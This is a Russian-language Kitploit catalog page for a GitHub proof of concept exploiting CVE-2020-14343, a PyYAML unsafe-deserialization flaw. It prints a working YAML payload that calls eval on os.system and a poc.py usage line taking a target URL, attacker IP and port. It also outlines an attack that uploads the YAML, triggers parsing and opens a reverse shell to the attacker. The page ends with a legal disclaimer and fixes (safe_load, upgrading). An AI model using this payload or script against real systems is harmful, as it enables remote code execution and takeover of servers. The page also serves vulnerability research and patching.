Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2020-14343-PyYAML — CVE-2020-14343的payload | Kitploit
Инструменты/GitHubGitHub/kairo-one/cve-2020-14343-pyyaml
Payload GenerationVulnerability AnalysisCode AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubkairo-one/cve-2020-14343-pyyaml

CVE-2020-14343-PyYAML

CVE-2020-14343的payload

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2020-14343 PyYAML Уязвимость десериализации POC

Обзор уязвимости

ЭлементИнформация
CVE IDCVE-2020-14343
Затронутый компонентPyYAML < 5.4
Тип уязвимостиУдаленное выполнение кода при десериализации (RCE)
Уровень опасностиВысокий

Принцип уязвимости

При использовании yaml.load() для разбора недоверенных данных PyYAML не ограничивает опасные теги YAML (например, !!python/object). Злоумышленник может сконструировать вредоносный YAML-контент для выполнения произвольного кода Python.

Основной Payload:

root@kitploit:~
!!python/object/new:tuple
  - !!python/object/new:map
    - !!python/name:eval
    - ["__import__('os').system('command')"]

Использование

root@kitploit:~
python poc.py <Целевой URL> <IP атакующего> <Порт прослушивания>

Пример:

root@kitploit:~
python poc.py http://vulnerable-site.com 192.168.1.100 4444

Ход атаки

  1. Скрипт запускает локальный TCP-прослушиватель
  2. Загружает вредоносный YAML-файл на целевой эндпоинт /upload
  3. Запускает загрузку и разбор YAML на эндпоинте /login
  4. Целевой сервер выполняет payload, устанавливая обратный shell на атакующего

Установка зависимостей

root@kitploit:~
pip install requests

Отказ от ответственности

⚠️ Данный инструмент предназначен только для исследований безопасности и авторизованного тестирования!

  • Не используйте в незаконных целях
  • Перед использованием убедитесь, что получили разрешение на тестирование целевой системы
  • Автор не несет ответственности за любое неправомерное использование

Рекомендации по исправлению

  1. Используйте yaml.safe_load() вместо yaml.load()
  2. Обновите PyYAML до версии 5.4 или выше
  3. Проводите строгую проверку пользовательского ввода

Ссылки

  • CVE-2020-14343 - NVD
  • Официальная документация PyYAML
Скачать инструмент